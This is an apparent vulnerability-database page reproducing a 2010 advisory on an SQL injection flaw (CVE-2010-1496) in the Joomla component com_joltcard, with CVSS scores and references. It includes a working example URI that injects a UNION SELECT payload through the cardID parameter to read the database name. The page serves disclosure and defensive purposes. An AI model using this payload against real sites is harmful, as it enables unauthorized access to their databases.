Joomla Component com_joltcard SQL Injection Vulnerability

2010-04-27 / 2010-04-28

Credit: Valentin

Risk: High

Local: No

Remote: Yes

CVE: CVE-2010-1496

CWE: CWE-89

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

# Exploit Title: Joomla Component com_joltcard SQL Injection Vulnerability
# Date: 17.04.2010
# Author: Valentin
# Category: webapps/0day
# Version: unknown
# Tested on:
# CVE :
# Code :
[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
|:: >> General Information
|:: Advisory/Exploit Title = Joomla Component com_joltcard SQL Injection Vulnerability
|:: Author = Valentin Hoebel
|:: Contact = valentin@xenuser.org
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
|:: >> Product information
|:: Name = com_joltcard
|:: Vendor = JOLT media
|:: Vendor Website = http://jolt.ca/
|:: Affected Version(s) = unknown
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
|:: >> #1 Vulnerability
|:: Type = SQL Injection
|:: Vulnerable Parameter(s) = cardID
|:: Example URI = index.php?option=com_joltcard&Itemid=XX&task=view&cardID=X+AND+1=2+UNION+SELECT+concat(database())--
|:: Selected information gets only displayed within the HTML source code (look at <OBJECT> tag).
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
|:: >> Additional Information
|:: Advisory/Exploit Published = 17.04.2010
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
|:: >> Misc
|:: Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase!
|::
|::
[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]

References:

http://xforce.iss.net/xforce/xfdb/57910

http://www.xenuser.org/documents/security/joomla_com_joltcard_sqli.txt

http://www.securityfocus.com/bid/39541

http://www.osvdb.org/63913

http://www.exploit-db.com/exploits/12269

http://secunia.com/advisories/39520

http://packetstormsecurity.org/1004-exploits/joomlajoltcard-sql.txt

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla Component com_joltcard SQL Injection Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.